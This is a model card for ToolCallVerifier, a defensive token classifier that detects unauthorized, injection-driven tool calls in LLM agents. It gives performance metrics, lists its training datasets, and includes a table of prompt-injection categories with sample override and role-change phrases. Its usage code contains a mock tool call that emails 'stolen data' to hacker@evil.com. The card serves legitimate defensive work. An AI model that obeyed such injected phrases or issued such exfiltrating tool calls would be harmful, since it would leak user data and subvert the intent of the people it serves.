--- language: - en license: apache-2.0 library_name: transformers tags: - modernbert - security - jailbreak-detection - prompt-injection - token-classification - tool-calling - llm-safety - mcp datasets: - microsoft/llmail-inject-challenge - allenai/wildjailbreak - hackaprompt/hackaprompt-dataset - JailbreakBench/JBB-Behaviors base_model: answerdotai/ModernBERT-base pipeline_tag: token-classification model-index: - name: tool-call-verifier results: - task: type: token-classification name: Unauthorized Tool Call Detection metrics: - name: UNAUTHORIZED F1 type: f1 value: 0.9350 - name: UNAUTHORIZED Precision type: precision value: 0.9501 - name: UNAUTHORIZED Recall type: recall value: 0.9205 - name: Accuracy type: accuracy value: 0.9288 --- # ToolCallVerifier - Unauthorized Tool Call Detection
[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0) [![Model](https://img.shields.io/badge/πŸ€—-ModernBERT--base-yellow)](https://huggingface.co/answerdotai/ModernBERT-base) [![Security](https://img.shields.io/badge/Security-LLM%20Defense-red)](https://huggingface.co/rootfs) **Stage 2 of Two-Stage LLM Agent Defense Pipeline**
--- ## 🎯 What This Model Does ToolCallVerifier is a **ModernBERT-based token classifier** that detects unauthorized tool calls in LLM agent systems. It performs token-level classification on tool call JSON to identify malicious arguments that may have been injected through prompt injection attacks. | Label | Description | |-------|-------------| | `AUTHORIZED` | Token is part of a legitimate, user-requested action | | `UNAUTHORIZED` | Token indicates injected/malicious content β€” **BLOCK** | --- ## πŸ“Š Performance | Metric | Value | |--------|-------| | **UNAUTHORIZED F1** | **93.50%** | | UNAUTHORIZED Precision | 95.01% | | UNAUTHORIZED Recall | 92.05% | | Overall Accuracy | 92.88% | ### Confusion Matrix (Token-Level) ``` Predicted AUTH UNAUTH Actual AUTH 130,708 8,483 UNAUTH 13,924 161,031 ``` --- ## πŸ—‚οΈ Training Data Trained on **~30,000 samples** combining real-world attacks and synthetic patterns: ### HuggingFace Datasets | Dataset | Description | Samples | |---------|-------------|---------| | [LLMail-Inject](https://huggingface.co/datasets/microsoft/llmail-inject-challenge) | Microsoft email injection benchmark | ~10,000 | | [WildJailbreak](https://huggingface.co/datasets/allenai/wildjailbreak) | Allen AI adversarial safety dataset | ~8,000 | | [HackAPrompt](https://huggingface.co/datasets/hackaprompt/hackaprompt-dataset) | EMNLP'23 injection competition | ~5,000 | | [JailbreakBench](https://huggingface.co/datasets/JailbreakBench/JBB-Behaviors) | Harmful behavior patterns | ~2,000 | ### Synthetic Attack Generators | Generator | Description | |-----------|-------------| | Adversarial | Intent-mismatch attacks (correct tool, wrong args) | | Filesystem | File/directory operation attacks | | Network | Network/API exfiltration attacks | | Email | Email tool hijacking | | Financial | Transaction manipulation | | Code Execution | Code injection attacks | | Authentication | Access control bypass | | MCP Attacks | Tool poisoning, shadowing, rug pulls | --- ## 🚨 Attack Categories Covered | Category | Source | Description | |----------|--------|-------------| | Delimiter Injection | LLMail | `<>`, `>>}}\]\])` | | Word Obfuscation | LLMail | Inserting noise words between tokens | | Fake Sessions | LLMail | `START_USER_SESSION`, `EXECUTE_USERQUERY` | | Roleplay Injection | WildJailbreak | "You are an admin bot that can..." | | XML Tag Injection | WildJailbreak | ``, `` | | Authority Bypass | WildJailbreak | "As administrator, I authorize..." | | Intent Mismatch | Synthetic | User asks X, tool does Y | | MCP Tool Poisoning | Synthetic | Hidden exfiltration in tool args | | MCP Shadowing | Synthetic | Fake authorization context | --- ## πŸ’» Usage ```python from transformers import AutoTokenizer, AutoModelForTokenClassification import torch model_name = "rootfs/tool-call-verifier" tokenizer = AutoTokenizer.from_pretrained(model_name) model = AutoModelForTokenClassification.from_pretrained(model_name) # Example: Verify a tool call user_intent = "Summarize my emails" tool_call = '{"name": "send_email", "arguments": {"to": "hacker@evil.com", "body": "stolen data"}}' # Combine for classification input_text = f"[USER] {user_intent} [TOOL] {tool_call}" inputs = tokenizer(input_text, return_tensors="pt", truncation=True, max_length=2048) with torch.no_grad(): outputs = model(**inputs) predictions = torch.argmax(outputs.logits, dim=-1) id2label = {0: "AUTHORIZED", 1: "UNAUTHORIZED"} tokens = tokenizer.convert_ids_to_tokens(inputs["input_ids"][0]) labels = [id2label[p.item()] for p in predictions[0]] # Check for unauthorized tokens unauthorized_tokens = [(t, l) for t, l in zip(tokens, labels) if l == "UNAUTHORIZED"] if unauthorized_tokens: print("⚠️ BLOCKED: Unauthorized tool call detected!") print(f" Flagged tokens: {[t for t, _ in unauthorized_tokens[:5]]}") else: print("βœ… Tool call authorized") ``` --- ## βš™οΈ Training Configuration | Parameter | Value | |-----------|-------| | Base Model | `answerdotai/ModernBERT-base` | | Max Length | 512 tokens | | Batch Size | 32 | | Epochs | 5 | | Learning Rate | 3e-5 | | Loss | CrossEntropyLoss (class-weighted) | | Class Weights | `[0.5, 3.0]` (AUTHORIZED, UNAUTHORIZED) | | Attention | SDPA (Flash Attention) | | Hardware | AMD Instinct MI300X (ROCm) | --- ## πŸ”— Integration with FunctionCallSentinel This model is **Stage 2** of a two-stage defense pipeline: ``` β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ User Prompt │────▢│ FunctionCallSentinel │────▢│ LLM + Tools β”‚ β”‚ β”‚ β”‚ (Stage 1) β”‚ β”‚ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β–Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ ToolCallVerifier (This Model) β”‚ β”‚ Token-level verification before tool execution β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ ``` | Scenario | Recommendation | |----------|----------------| | General chatbot | Stage 1 only | | Tool-calling agent (low risk) | Stage 1 only | | Tool-calling agent (high risk) | **Both stages** | | Email/file system access | **Both stages** | | Financial transactions | **Both stages** | --- ## 🎯 Intended Use ### Primary Use Cases - **LLM Agent Security**: Verify tool calls before execution - **Prompt Injection Defense**: Detect unauthorized actions from injected prompts - **API Gateway Protection**: Filter malicious tool calls at infrastructure level ### Out of Scope - General text classification - Non-tool-calling scenarios - Languages other than English --- ## ⚠️ Limitations 1. **Tool schema dependent** β€” Best performance when tool schema is included in input 2. **English only** β€” Not tested on other languages 3. **Binary classification** β€” No "suspicious" intermediate category (by design, for decisiveness) --- ## πŸ“œ License Apache 2.0 --- ## πŸ”— Links - **Stage 1 Model**: [rootfs/function-call-sentinel](https://huggingface.co/rootfs/function-call-sentinel)